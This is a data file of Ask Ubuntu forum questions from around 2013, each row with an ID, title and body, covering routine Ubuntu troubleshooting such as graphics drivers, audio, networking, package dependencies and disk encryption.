289659	using nvidia 319 with bumblebee	i have optimus laptop running raring and now i 'm using nvidia 304 drivers , which have bad performance and some games are not working properly ( e.g . oil rush is working properly only with 319 , with older drivers i have a problem with lighting , so the game is unplayable ) so is there a way how to run bumblebee with nvidia 319 downloaded from nvidia website ? i know about bumblebee config , but i do n't know what should i edit in it . thanks for help .
289662	do ubuntu pc programs work on ubuntu tablet ?	i 'm would like to know if all the programs made for ubuntu pc would work on tablet with ubuntu ? thanks in advance !
289664	select speaker output with headphones inserted ( ubuntu 13.04 )	i just installed ubuntu 13.04 on my desktop machine and have a problem with speakers and headphones . speakers as well as headphones are working independently , but not together . every time i plug my headphones into my front audio jack ubuntu switches to the headphone output . when i reselect the speakers output in the settings- > sound menu , nothing happens . the headphones still play . to me , it seems that ubuntu routes the sound output to headphones if they are inserted regardless whether they are selected ( the `` test-function '' inside the sound settings plays regardless of output selection both times headphones , but not if i select the digital output port s/pdif ) . i installed gnome-alsamixer , but can not start it , since it gives me a seg fault . any ideas / suggestions ?
289666	why is dropbox not included in sync indicator in 13.04 ?	why is drop box not included in sync indicator manu in ubuntu 13.04 ? ubuntu one is , but there is no drop box . now i have two indicators . one for ubuntu one and one for drop box . is there a way to have just one ? if not , is it going to be possible in the future ?
289667	installing ubuntu 12.04 vm on windows 7	i 'm trying to install ubuntu 12.04 as a vm guest , windows 7 host ( tried installing ubuntu 13 before that , as a guest as well , but got the same problem ) on vmware . my problem is that i end up on a terminal that tells me : welcome to ubuntu 12.04.2 lts ( gnu/linux 3.5.0-23-generic i686 ) *documentation : https : //help.ubuntu.com/ 167 packages can be updated . 82 updates are security updates . is this normal ? could anyone tell me what to type afterwards ?
289677	how to improve performance of virtualbox when unity_low_gfx_mode is not working ?	i set export unity_low_gfx_mode=1 in my ~/.xprofile and it no longer has any effect in 13.04 . is there a way to disable all the eye candy ? i 'm running in virtualbox and the unity 3d mode with all the visual effects is overwhelming for the vm . unity works and is usable , it 's just very slow to render , so i 'd rather have it off ( is this 2d mode ? ) .
289685	my internet connection turns off in 13.04	i connect to the internet via wifi for several minutes , and then it disconnects without telling me anything ( the image of internet connections says i am still connected ) . i have to click in my wireless network to connect again for a small period of time . when i use another computer with windows my internet never turns off . i believe i have used this computer with other wireless networks and the internet never shuts down . but also i have had the same problem with other wireless networks . i have to say that i do not have much experience with network connections . thanks for the support ubuntu community .
289686	change xubuntu 's default text editor globally	there 's a lot of tutorials on how to change the default text editor in unity and gnome . there 's none for xubuntu/xfce . how do i change all mousepad 's associations to sublime text ? i know i could install unity tweak tool , but that loads a lot of dependencies , including compiz . i do n't want that . i know i can right click a file and do `` open with '' . there 's a lot of file types i am willing to change ( ruby , php , html , css , js , coffee , ... ) , so that 's not the way either . update-alternatives is not the way either : there are 4 choices for the alternative editor ( providing /usr/bin/editor ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/bin/vim.gtk 50 auto mode 1 /bin/ed -100 manual mode 2 /bin/nano 40 manual mode 3 /usr/bin/vim.gtk 50 manual mode 4 /usr/bin/vim.tiny 10 manual mode press enter to keep the current choice [ * ] , or type selection number :
289696	set mount options for removable devices on kubuntu	i share my computer in a multiseat configuration and would like everyone to mount removable devices with a umask of 0 ( ie . readable and writeable by all and sundry ) . well , ideally just by group disks or plugdev or something , but global will do in a pinch . except nope , it insists on mode 700 with owner and group as my user . things i thought might work but did n't : policy kit this got people able to mount the device . but the permissions were wrong . it does not seem to be possible to change the permissions here -- -i think only udisks can . udev tried this rule and did n't manage to get the usb stick . however i 'm pretty sure it 's moot as this would be the permissions for the device and not the mountpoint and those are already adequate with a gid of disk . kernel== '' sd* [ 0-9 ] '' , attr { removable } == '' 1 '' , env { id_bus } == '' usb '' , mode= '' 0000 '' kde device notifier + udisks udisks performs the mount operation for the kde device notifier . however , it does not have any setting to control/override the mount options it uses . device notifier does not seem to have any setting for group or umask either . however , if one mounts it manually , things work fine . this does anyhow : udisks -- mount /dev/sdf1 -- mount-options umask=0 udisks-glue a very promising tool , but no dice . udisks-glue lets your configure custom reactions to udisks events on dbus ! it can automount devices and you can control the umask for that . alas this has no effect on the mount options for the device notifier and there is no setting to override mount options generally . it can trigger an event when udisks mounts something . so i thought i 'd use it to remount the drive . except it turns out that while it passes along most mount options just fine , udisks can not handle remount . $ udisks -- mount /dev/sdf1 -- mount-options umask=0 , remount mount failed : mount option remount is not allowed aaaand i 'm stumped . any ideas ? i 'm on 12.10 still , maybe 13.04 has some magic for this ?
289697	accessing pulseaudio server	i 've set up pulseaudio on my ubuntu server to receive tcp streams like suggested in the pulseaudio documentation and many tutorials . my /etc/pulse/default.pa now contains these lines : load-module module-esound-protocol-tcp auth-anonymous=1 load-module module-native-protocol-tcp load-module module-zeroconf-publish i 've restarted the daemon using pulseaudio -k pulseaudio -d from my understanding i should now be able to use the server as sink from my client . ideally i 'd like to select the output device with pulseaudio volume control but get it to work at all . i 've tried to set pulse_server to point to my server but i get playback errors . can anyone tell me if my server configuration is right and how to configure the client ( 13.04 ) ? update i finally found out that i have to load the module module-zeroconf-discover on the client . if i now restart the daemon on the client the server is discovered but the sink ca n't be created . /var/log/syslog says this : pulseaudio [ 4877 ] : [ pulseaudio ] module-tunnel.c : failed to create sink . pulseaudio [ 4877 ] : [ pulseaudio ] module.c : failed to load module `` module-tunnel-sink '' ( argument : `` server= [ 192.168.1.2 ] :4713 sink=auto_null format=s16le channels=2 rate=44100 sink_name=tunnel.myserver.local.auto_null channel_map=front-left , front-right '' ) : initialization failed . pulseaudio [ 4877 ] : [ pulseaudio ] module-tunnel.c : failed to authenticate i do n't quite get how it can fail to authenticate if anonymous login is allowed . update the authentication failure seems to happen randomly . if it does n't appear the relevant log entry is [ pulseaudio ] module-tunnel.c : stream died . instead . the other two entries look the same .
289699	ubuntu 12.04 ca n't install d-link dwm-156 drivers	when connected to ubuntu 12.04 d-link dwm-156 detects it as usb storage medium but not as modem . it explored data stick in windows and copied files `` 3g_modem_connect_dwm156_i386.deb '' & `` 3g_modem_connect_dwm156_amd64.deb '' files in ubuntu and tried to execute them but none of them run . i am new in ubuntu and do n't know commands , kindly answer in simple words .
289705	any way to restore connect to windows share as a different user ?	when i upgraded to ubuntu 13.04 the file manager lost the ability to connect to windows shares as a specific user ( from 'connect to server ' ) from the file manager . i could be connected to z share as one user and x share as another , but now connect to server offers no place to add credentials as it used to . when i try without credentials , i get an error that says `` unable to access location - failed to mount windows share - permission denied '' . i find screenshots where it 's supposed to prompt me for a username and password , but i never get it . just an error . is there something that maybe carried over from the previous version ? should i delete ~/.nautilus ? or something ?
289706	how can i assign custom icons to folders persistently ?	is there some way to achieve icon persistence on ubuntu with nautilus or some other file manager ? so far when i change an icon from the properties of the folder the change wo n't remain visible if copied to another disk . edit : i found a file .directory that kubuntu had installed in my ubuntu distro . it seems to have data about icons but i ca n't figure out how it works .
289710	how to change password for full disk encryption ?	when i installed ubuntu , i opted to encrypt the whole os . i enter a password every time my computer boots up ( note : i 'm not talking about the log-in screen -- i enter a password to get to that screen ) . i 'm not trying to remove this or anything , but i want to change the password . someone recommended that i check out the gnome disk utility , which i did . i can see my computer 's hard drive , but , when i click on it , i 'm only able to do anything related to encryption on one of the partitions . i assumed this was the partition that i needed to change the password to , but , after i edited the password , i had to use the previous password upon the next boot . i have no idea what i edited now ( i removed the password from it because i have no clue what it is ) , and i still have no clue how to change the password that i want to change . hoping someone can help .
289711	view *.eps files	since evince does n't work with *.eps on 13.04 ( see bellow ) , is there any other app to quickly open ( not edit ) a *.eps file ? petr @ sova : ~ $ evince histogram_default.eps undefined -21 undefined -21 ( evince:12208 ) : evincedocument-critical ** : ev_document_misc_pixbuf_from_surface : assertion `surface ' failed ( evince:12208 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed
289714	need help installing ubuntu 13.04 !	need help installing ubuntu 13.04 ! i 'm a newbie , trying to install linux for the first time . i purchased a small 14 '' asus with windows 8 and hate the new windows 8 ! i have tried downloading ubuntu 13.04 and installing it as a dual boot for now , but i keep getting an error . the machine will power up and give me an option to either enter windows or ubuntu . windows works , but ubuntu wo n't launch . it will just display a windows error . what 's the correct steps to installing ubuntu ? thanks , bigmike75 sorry , i have been on the road lately . here is the error that i keep getting . http : //i1310.photobucket.com/albums/s659/mike_scamardo/null_zps428050ae-1.jpg
289717	unmet dependencies ( libgssapi-krb5-2 : depends : libkrb5-3 ( = 1.10.1 + dfsg-4 ) but 1:10 + dfsg ~ beta1-2 is installed )	how do i solve this dependency ? root @ server : / # apt-get upgrade reading package lists ... ready building dependency tree reading state information ... ready you might want to run `apt-get-f install 'to correct them . the following packages have unmet dependencies : libgssapi-krb5-2 : depends : libkrb5-3 ( = 1.10.1 + dfsg-4 ) but 1:10 + dfsg ~ beta1-2 is installed e : unmet dependencies . try using-f . i have a server with ubuntu 12:04 erp system and database . i can not lose information . if i follow the command suggested i lose my data . root @ server : / # apt-get install-f reading package lists ... ready building dependency tree reading state information ... ready correcting dependencies ... ready the following packages were automatically installed and are no longer required : sound-theme-freedesktop-libplist1 libgconf 2-4 gconf2-common python-libcdio13 libtwolame0 pyorbit libgnome2-0 python-numpy python-avahi usbmuxd libcaca0 libsamplerate0 gstreamer0.10-plugins-ugly libavc1394 libx264-120-0 libbonobo2-common libgpod-common gstreamer0.10-alsa libgnome2-bin libimobiledevice2 python-matplotlib-data git-man libbonobo2-0 python-egenix-mxtools libgnomevfs2-common python-mutagen libspeex1 gconf2 libjack-jackd2-0 libavahi-glib1 xsane-common python-pyinotify liblapack3gf libgpod4 libcanberra0 libwavpack1 gnome2.4 libsoup-1-tdb-tools gstreamer0.10-plugins-good libidl ttf-lyx-common libgconf2-4 libiec61883 libmp3lame0-0 libgnome2-common python-daap libgnomevfs2-0 mlock alsa-utils libidl0 liba52-0.7.4 libvorbisfile3 libflac8 libraw1394-11 libshout3 libdv4 libdvdnav4 libdvdread4 gstreamer0.10-x libblas3gf python-gobject libusbmuxd1 libgnomeui-common libsidplay1 alsa-base python-liborbit2 libtag1c2a gst0.10 libmad0 libgfortran3 libopencore-amrnb0 gconf-service python-xlib libbonoboui2-common python-python-egenix-mxdatetime gpod amrwb0 libopencore-python-gconf linux-sound-base libmpeg2-4 libgnomecanvas2-common gconf-backend-service libtag1-vanilla use 'apt-get autoremove ' to remove them . the following packages will be removed : apt-transport-https avahi-daemon bind9 bind9-host bind9utils cups cups-bsd cups-client cups-filters cups-cups-pk-helper ppdc curl dnsutils ghostscript-cups ghostscript gimp git gnome-icon-theme gs-cjk-resource heirloom-mailx humanity-icon-theme libbind9 libbonoboui2-80-0 libc-client2007e libcanberra-gtk3-0 libcanberra-gtk3-module libcups2 libcupscgi1 libcupsdriver1 libcupsfilters-dev libcupsfilters1 libcupsimage2 libcupsmime1 libcupsppdc1 libcupt2-0-downloadmethod-curl libcurl3 libcurl3-gnutls libdns81 libgail18 libgimp2.0 libglade2-0 libgnomecanvas2-0 libgnomeui-0 libgs9 libgssapi-krb5-2 libgtk-perl , libgssapi 3-0 libgtk-3-bin libgtk2.0-0 libgtk2.0-bin-libhippocanvas 1-0 libisccfg82 libnss-mdns libpq5 libwebkitgtk librsvg2-common-1.0-0 stripe lsb lsb-core lsb-cxx lsb-desktop lsb-graphics lsb-printing notification-daemon openssh-client openssh-server php5-imap policykit-1-gnome postgresql postgresql-9.1 postgresql-client-9.1 printer-driver-gutenprint printer-driver-pnm2ppa glade2 python-python-gnome2 python-gtk2 python-hippocanvas python-matplotlib python-psycopg2 python-webkit samba samba-common-bin smbclient sane swat ssh ubuntu-standard whoopsie xpp xsane 0 upgraded , 0 newly installed , 90 to remove and 2 not upgraded . 22 not fully installed or removed . after this operation , 251 mb disk space will be freed .
289718	dell 3721 display problem ubuntu 13.04	after i upgrade from ubuntu 12.10 to 13.04 i ca n't change the brightness of the display , it remain in the darkest possible mode . i have a dell 3721 laptop . any advice ? @ dell : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 )
289719	ca n't get xterm to work . display not set .	here are my settings : $ xterm xterm xt error : ca n't open display : xterm : display is not set $ echo $ display $ cat /etc/ssh/sshd_config | grep x x11forwarding yes x11displayoffset 10
289720	how do i dual boot my android ice cream sandwich tablet with ubuntu	i have android 4.04 ice cream sandwich as it was pre installed . i have an archos 80 cobalt . how would i dual boot with ubuntu ?
289724	the & & concatenator stopped working when executing `` sudo aptitude update & & sudo aptitude upgrade '' . 多why is that happening ?	problems with & & concatenator . it stopped concatenating . i ran : sudo add-apt-repository ppa : igorgomes/ppa sudo aptitude update the aptitude update command began generating a screen output error ( that i did n't remember to record ) and since then the sequence sudo aptitude update & & sudo aptitude upgrade stopped working . in concrete the first command executed but the second did n't . i could fix it by removing the appropriate files on the folder `` /etc/apt/sources.list.d '' so the aptitude update command is working fine again , and so , the sudo aptitude update & & sudo aptitude upgradecombination` is working againt too . the problem has been solved but i 'm really curious 多why did it happen ? it 's not the first time the concatenator & & stops working to me and i never found out what 's the logic behind it . 多did it happen to anybody that could find out the reason ? thank you in advance pulchras
289726	ubuntu 13.04 : set terminator as default terminal emulator with nautilus `` open terminal ''	i have upgraded to ubuntu 13.04 a few days ago . with ubuntu 12.10 i had set the default terminal with : gsettings set org.gnome.desktop.default-applications.terminal exec /usr/bin/terminator gsettings set org.gnome.desktop.default-applications.terminal exec-arg `` -x '' i had set it with sudo update-alternatives -- config x-terminal-emulator too . but none of these options work on ubuntu 13.04 . how can i set terminator as default terminal emulator with nautilus `` open terminal '' ? this is n't a duplicate . as i 've said : the solutions in how can i set default terminal used ? does n't work on ubuntu 13.04 with nautilus `` open terminal '' . my question is : `` set terminator as default terminal emulator with nautilus `` open terminal '' on ubuntu 13.04 ''
289728	failed backup after upgrade	no backup since upgrade to 13.04 . i get : giving up on request after 5 attempts , last status 400 bad request
289731	how can i downgrade gcc 4.7.2 ?	i want to downgrade gcc and g++ 4.7.2 to some older versions , 4.0 perhaps . any assistance ? i 'm using lubuntu atm .
289738	lubuntu upgrade to 13.04 killed sound with alsa . how to troubleshoot ?	after upgrading to 13.04 from 12.10 lubuntu lost audio playback after unplugging usb soundcard ( polycom ) and plugging it back in . volume control was gray and leading to pulseaudio mixer ( not installed ) so i uninstalled the pulseaudio package . i also removed and reinstalled the alsa-base package . after restart i have the alsamixer back everything seemingly as usual ( volume 100 % , unmute ) but every sound program gets me errors no matter what device i select . aplay -l : null discard all samples ( playback ) or generate zero samples ( capture ) pulse pulseaudio sound server default : card=nvidia hda nvidia , alc662 rev1 analog default audio device sysdefault : card=nvidia hda nvidia , alc662 rev1 analog default audio device front : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=nvidia , dev=0 hda nvidia , alc662 rev1 digital iec958 ( s/pdif ) digital audio output hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample mixing device dmix : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct sample mixing device dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample snooping device dsnoop : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct sample snooping device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct hardware device without any conversions hw : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct hardware device without any conversions hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog hardware device with all software conversions plughw : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital hardware device with all software conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions default : card=communicator default audio device sysdefault : card=communicator default audio device front : card=communicator , dev=0 polycom communicator , usb audio front speakers surround40 : card=communicator , dev=0 polycom communicator , usb audio 4.0 surround output to front and rear speakers surround41 : card=communicator , dev=0 polycom communicator , usb audio 4.1 surround output to front , rear and subwoofer speakers surround50 : card=communicator , dev=0 polycom communicator , usb audio 5.0 surround output to front , center and rear speakers surround51 : card=communicator , dev=0 polycom communicator , usb audio 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=communicator , dev=0 polycom communicator , usb audio 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=communicator , dev=0 polycom communicator , usb audio iec958 ( s/pdif ) digital audio output dmix : card=communicator , dev=0 polycom communicator , usb audio direct sample mixing device dsnoop : card=communicator , dev=0 polycom communicator , usb audio direct sample snooping device hw : card=communicator , dev=0 polycom communicator , usb audio direct hardware device without any conversions plughw : card=communicator , dev=0 polycom communicator , usb audio hardware device with all software conversions etc/asound.conf : defaults.ctl.card 1 defaults.pcm.card 1 defaults.pcm.device 1 following gets same result with both devices . aplay -vv -d front : card=nvidia , dev=0 `` release the pressure.wav '' : playing wave 'release the pressure.wav ' : signed 16 bit little endian , rate 44100 hz , mono aplay : set_params:1087 : channels count non available guayadeque mp3 playback : al lib : alsa_open_playback : could not open playback device 'default ' : no such file or directory 21:32:14 : error : gstreamer error 'configured audiosink playbackbin is not working . ' audacious : alsa error : snd_mixer_attach failed : no such file or directory . alsa error : snd_pcm_open failed : no such device . so how do i fix my audio ? update : i removed the usb soundcard and got rid of all alsa config . everything is working as before the install but it sure feels fragile .
289741	in 13.04 , google chrome wo n't install	i have installed 13.04 on my laptop but whenever i try to install google chrome from the .deb file , it says : `` dependency is not satisfiable : libudev0 ( > = 147 ) '' . i have searched the repositories and have not found it . how can i resolve this ? i unfortunately need flash compatibility for a few web apps that i use for business so i ca n't use chromium , firefox , epiphany , etc . if i could i would ! : (
289745	icedtea-7-plugin non-functional in ubuntu 13.04	i installed ( sudo apt-get install ) icedtea-7-plugin ( and all its dependencies ) and have closed firefox and reopened it ; and the plugin still does not appear in http//about : plugins is there a fix for this ? output of : java -version java version `` 1.7.0_21 '' openjdk runtime environment ( icedtea 2.3.9 ) ( 7u21-2.3.9-1ubuntu1 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) output of : update-java-alternatives -l java-1.6.0-openjdk-amd64 1061 /usr/lib/jvm/java-1.6.0-openjdk-amd64 java-1.7.0-openjdk-amd64 1071 /usr/lib/jvm/java-1.7.0-openjdk-amd64 java-gcj-4.7 /usr/lib/jvm/java-gcj-4.7
289747	are there any standard icons for qml-app-development ?	i am developing a qml-app and i want to put icons on the buttons . i would like to use ubuntu standard icons to get the real ubuntu look for my app . how can i do this ?
289752	how to disconnect a networkconnection ?	i have a small problem which i liked to be solved . my ( hardware- ) configuration : asus motherboard with 1 connector for ethernet ( eth0 ) pci network card with 2 connectors for ethernet ( eth2 & eth3 ) ( eth3 has no cable plugged in ) my ( software- ) configuration : ( main ) ubuntu 12.04 lts ( virtual ) windows 7 x64 with vmware workstation 9 i dedicated my ubuntu and my webserver to use eth0 . ( that is the idea ) . and mine w7 to use eth2 . ( this is a bridged connection to eth2 ) . but to make my webserver work , i have to disconnect my eth2 . i looked for some info but i only came across `` ifconfig eth2 down '' . which doesnt help , because it shuts down the port , instead of the connection , and because of that my vm will lose connection as well . what is a similair command to `` ifconfig eth2 down '' that only disconnects the network . the result should look like this
289771	geforce gt 750m graphics driver for ubuntu 12.04	my computer has an nvidia geforce gt 750m graphics card . it 's unknown in ubuntu 12.04 . my graphics card is unknown in system details . in additional drivers , no proprietary driver is found . i tried to install nvidia-current , but it does n't work . i could n't even login to ubuntu after i installed nvidia-current .
289776	sudo apt-get not working in 13.04	sudo apt-get update not working in newly installed 13.04 version . i have updated the apt.conf also as my network is authenticated . it is stuck at this step : - 0 % [ connecting to archive.ubuntu.com ( 91.189.91.14 ) ] [ connecting to archive.canonical.com ( 91.189.92.150 ) ] [ connecting to extras.ubuntu.com
289779	after upgrading to ubuntu 13.04 , kde programs do n't work any more	after upgrading to ubuntu 13.04 i can not run any more kde programs under ubuntu . i have both installed . ubuntu and kubuntu . i run rkonq and k3b already lots of years under ubuntu . but after the upgrade it is not possible any more . this is what i get starting rekonq from a terminal : qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . unnamed app ( 3756 ) kdemain : rekonq is already running !
289781	need to redirect all port 80 and 443 gateway traffic to its webserver	i have a gateway server that with this simple iptables rules : # ! /bin/bash echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -a prerouting -s 192.168.1.0/255.255.255.0 -p tcp -- dport 80 -j dnat -- to-destination 192.168.1.254 iptables -t nat -a prerouting -s 192.168.1.0/255.255.255.0 -p tcp -- dport 443 -j dnat -- to-destination 192.168.1.254 iptables -t nat -a postrouting -j masquerade can redirect all requests ( on port 80 ) to his webserver ( showing all users a `` forced '' page ) . this works flawlessly if the user opens any http site but fails if the user tries sites like facebook or gmail that are https and gets a `` this page is not available '' error . what am i doing wrong ? if my idea is not the best i can accept any kind of solutions that will allow me to obtain the result to force all users that have this server as gateway to see only a specific webpage i decide when they try to surf the web .
289782	windows installer and 13.04	is there anything in the pipeline to bring 13.04 to windows installer ? also , just to mention , i have absolutely no problem running 12.10 via windows installer on windows 8 pro even though it says it does n't work on the website . i find it extremely useful !
289783	how to start freecell , installed from software center	freecell solitarire wo n't load on ubuntu 13.04 . in the software center it appears as installed but does n't appear in search . uninstalling and reinstalling did not help . as a workaround , would it be possible to start freecell from terminal and then make a shortcut on it to my desktop . what command do i use to start a prrogram/application from terminal ? or is there a better way ?
289792	why does ubuntu 12.04 randomly reboot in unity and gnome , but not in xfce ?	currently running 12.04 lts and i find that on a fresh install the system reboots when using unity or gnome , but runs stable when using xfce . this piqued my interest as to why this would be ? how does xfce differ from the other two ? specifically , how does it differ with regard to the graphics drivers ? logically , the drivers should be completely independent from the de , but most sources seem to indicate that the culprit is the gfx drivers . so the question becomes two-fold : how does one go about diagnosing a problem like random restarts ? why would it not crash under xfce , but under gnome and unity ? system info : release 12.04 ( precise ) 32-bit kernel linux 3.5.0-23-generic gnome3.4.2 xfce4.8
289793	manual lvm encryption setup with ubuntu 13.04	i am trying hard to get ubiquity works . the thing is that i want to setup ubuntu 13.04 on a full encrypted lvm aside a windows installation . so i ca n't use the default option of full disk encryption . the issue is when i try to use a partition as physical encryption volume i always get an error concerning keyfile . and if i make the partition before launching ubiquity , then i get an error when i try to make the mapping between logical volumes and mount points . this was working great with alternate cd ( or usb ) but since they shutdown this ubuntu image , i 'm stuck . maybe it is time to look for another linux distro or maybe someone has a solution ...
289801	is it possible to install the same applications on ubuntu touch and ubuntu desktop ?	i saw apps like gimp running on ubuntu touch , but what about applications like magic draw ?
289802	how can i set my ubuntu for flashing my android phone	i 'm new to linux/ubuntu . i installed ubuntu because i was interested in it true my phone ( and in the future of course ubuntu touch ) . normally i flashed my phone ( sony xperia ) via flashboot and fastboot . now i want to get my pc in order to flash again , the only problem is i do n't know how to setup-install everything . of course i googled , because i 'm not familiar with ubuntu . i think i need : flashtool fastboot and ( drivers ? ) how do i get it working ? do i need to obtain su rights ? and how ?
289813	can not create a directory to /home	is it normal that i ca n't create directories in /home partition as a normal user ? example : user @ pc : /home $ mkdir test mkdir : can not create directory ‘test’ : permission denied is that normal ?
289814	why is the life of ubuntu 13.04 so short ?	looking at the release page , i noticed the short life of 13.04 . it is only 8 months : april 2013 to january 2014 . why is the life of 13.04 so short ?
289818	how can i clean my software caches from the command line ?	in the upgrade from 12.10 to 13.04 i lost the ability to use ubuntu tweak 's janitor to clean caches so i would like to know how to do it from the command line .
289819	why do i get a blank black screen when i try to install lubuntu 13.04 on a 12 '' powerbook ?	i thought i 'd try lubuntu out but i 'm having problems right off the bat : i get a blank black screen when trying to install . i created a bug report on launchpad and i 've been searching around more and i 've tried a few more boot options like nouveau.modeset=0 and i still just get a black screen .
289827	my toshiba laptop does n't find the external monitor	having used ubuntu 12.04 and still using mint 14.1 with an additional monitor on my toshiba , when i installed ubuntu 13.04 on the same laptop with that same monitor , it does n't see the monitor . it displays boot up on the external monitor but once booted will only see and use the laptop display . the system otherwise works perfectly ... toshiba tecra-r10 processor : intel core 2 duo cpu p9400 @ 2.4ghz x 2 graphics : quadro nvs 150m/pcie/sse2 the graphic driver shows as gallium 0.4 on nv98 . that 's all i know on the subject .
289828	looking for a web development ide with built-in ftp functionality	coming from using espresso ( not the drink , haha ) on a mac , i 'm looking for a web development ide that provides a built in ftp upload/download ability . the reason being , every seperate ftp client ( filezilla , etc . ) i 've tried does n't work correctly . thanks in advance !
289829	ca n't install c++ library	i want to install the c++ library , but the terminal keeps asking me to insert the cd for installation . what cd ? here is the terminal code i used to attempt to install with : sudo apt-get install build-essential after i enter in my password and hit y , it says : media change why does it say that ? can anyone help me either with this problem or find another way to install the c++ library ? thanks .
289830	keyboard backlight command by percentage	i want to make a keyboard shortcut to increase and the decrease the keyboard backlight brightness . the command i have for full brightness is : echo -n 100 > /sys/class/leds/chromeos\ : \ : kbd_backlight/brightness no keyboard led brightness ( off ) : echo -n 0 > /sys/class/leds/chromeos\ : \ : kbd_backlight/brightness if i wanted to get the current brighness i would : cat /sys/class/leds/chromeos\ : \ : kbd_backlight/brightness whats the simplest way to increase and decrease the values by a percantage , like 12 % . this seems like a fairly common task .
289832	difference between ubuntu and debian command line use	is there a difference between ubuntu and debian with regard to command line and terminal use ? i 'm talking about things like command syntax , options , etc..
289835	battery issues with 13.04	my battery has been strange since on 13.04 . i left my office with battery almost 100 % charged , came home took a shower , and when i went to turn on my computer , the battery was dead . the power statics say battery not present . what can i do ? i would like to add this was working fine before today on 13.04 dustin @ dustin : ~ $ dmesg | grep battery [ 2.848289 ] acpi : battery slot [ bat1 ] ( battery present ) dustin @ dustin : ~ $ cat /proc/acpi/battery/bat1/info cat : /proc/acpi/battery/bat1/info : no such file or directory dustin @ dustin : ~ $
289839	networkmanager run script before connection based on ssid	is it possible to have networkmanager run a script before it connects to a wifi network and pass the ssid of the network to the script ( or just execute a script based on ssid ) ? i 'm switching back from wicd and am sorely missing this ability . i googled around but all i could find is /etc/networkmanager/dispatcher.d/* which seems to execute after the connection is established and does n't pass the ssid .
289840	12.10 kernel upgrade to 3.5.0-28 breaks booting into desktop	i updated my 12.10 installation on a t430 thinkpad to kernel 3.5.0-28 . after restarting , it would boot into grub but then hang on a blank purple screen when trying to boot with kernel 3.5.0-28 . booting with kernel 3.5.0-27 worked fine .
289856	update from 12.10 to 13.04 does not work ?	when trying to update through sudo apt-get update i am getting these errors : i am kinda new to ubuntu so any help would be appreciated : ) w : failed to fetch http : //archive.canonical.com/quantal/dists/precise/partner/binary-amd64/packages 404 not found w : failed to fetch http : //archive.canonical.com/quantal/dists/precise/partner/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
289857	does using 2 oss affect cpu speed ?	i have windows 7 already installed on my laptop and i would like to know if installing ubuntu as well would affect my processor 's speed . here are the specs for the processor : http : //ark.intel.com/products/53442/intel-core-i3-2370m-processor- ( 3m-cache-2_40-ghz ) . the laptop came with 4gb of memory and a 500gb hd .
289858	`` disk drive for dev/mapper/cryptswap 1 is not ready ''	i get the following message on ubuntu 12.04 lts i386 during the boot process : disk drive for dev/mapper/cryptswap 1 is not ready or not present it will give me the message about 3 times and then finally load but i am also getting internal errors ( last night and this morning i pretty well was flooded with them ) . i am completely new to ubuntu and linux so am i doing the best i can to learn as quickly i am able but it would really be helpful if i could chat with someone as the machine i have apparently is a bit of a pain in general ( hp dc7700sf ) .
289860	how do i change permission back to where it was ?	i did a sudo chmod a+rwx /usr/local/java . after listing the ls -la , the ( . ) permission when from drwxr-xr-x to drwxrwxrwx . how do i change it back ?
289869	ubuntu 12.10 , i ca n't clean up space in boot directory	i 'm trying to update but it ca n't and tells me that i need to clear up space in the boot directory but i ca n't remove anything from it and the sudo command does nothing . below is the actual message i get . the upgrade needs a total of 26.0 m free space on disk '/boot ' . please free at least an additional 5,055 k of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . please help , oh btw , yes i 'm fairly new to linux so please bear with me .
289871	window tiling ( move-to- { corner , side } ) shortcuts in ubuntu 13.04	i am trying to figure out how i can change the window tiling shortcuts in ubuntu 13.04 . currently they are set to < ctrl > < alt > numpadn . first i tried to check the shortcuts available in keyboard settings in system settings > keyboard > shortcuts > windows but it was n't there . then i opened dconf-editor and navigated org.gnome.desktop.wm.keybindings . there i found following keys : move-to-center , move-to-corner-ne , move-to-corner-nw , ... they are all set to the default value , which is the current working one ( e.g . move-to-corner-nw = > [ ' < primary > < alt > kp_home ' ] ) . when i try to change this , nothing happens no matter what shortcut i change to , rather the default value is used . for other keys within the same schema , like switch-to-workspace-1 or minimize the changes set in , they works . my question is why is values of move-to- ... keys are ignored ? how can i make this shortcut change ? thanks . ciuncan
